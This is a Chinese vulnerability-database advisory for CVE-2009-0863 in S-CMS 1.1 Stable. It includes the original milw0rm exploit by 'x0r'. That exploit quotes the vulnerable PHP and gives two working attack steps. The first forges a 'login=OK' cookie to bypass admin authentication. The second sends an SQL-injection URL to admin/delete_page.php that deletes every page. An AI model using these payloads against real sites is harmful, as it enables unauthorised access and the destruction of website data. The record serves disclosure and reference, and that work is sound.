Matteoiammarrone S-CMS 'admin/delete_page.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117409 漏洞类型 SQL注入
发布时间 2009-02-17 更新时间 2009-03-10
CVE编号 CVE-2009-0863 CNNVD-ID CNNVD-200903-198
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-198
|漏洞详情
S-Cms一款基于PHP/MySQL的内容管理系统(CMS)。S-Cms1.1Stable的admin/delete_page.php中存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意SQL指令。
|漏洞EXP
#########################################################################################
[0x01] Informations:

Name           : S-Cms 1.1 Stable 
Download       : http://www.hotscripts.com/listings/jump/download/87992/
Vulnerability  : Insecure Cookie Handling / Mass Page Delete
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/login_action.php ... /admin/delete_page.php

[Code]

$user=$_POST['username'];
$pass=$_POST['password'];

$select_admin = mysql_query("SELECT * FROM cms_admin");

while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}

if ($user == $username && $pass == $password){
 
   setcookie("login", "OK", time() + $logintime); #0wn3d

[/code]

[CODE]
	
		$id=$_GET['id'];
		
		$delete=mysql_query("DELETE FROM cms_content WHERE id='$id'");
		
		
		if ($delete){
		
		echo ""._DELETE_PAGE_SUCCESS."";
		
		} else {
		
		echo ""._DELETE_PAGE_ERROR."";
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: 1- javascript:document.cookie = "login=OK; path=/"
         2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*

########################################################################################

# milw0rm.com [2009-02-17]
|参考资料

来源:XF
名称:scms-deletepage-sql-injection(48806)
链接:http://xforce.iss.net/xforce/xfdb/48806
来源:BID
名称:33799
链接:http://www.securityfocus.com/bid/33799
来源:MILW0RM
名称:8071
链接:http://www.milw0rm.com/exploits/8071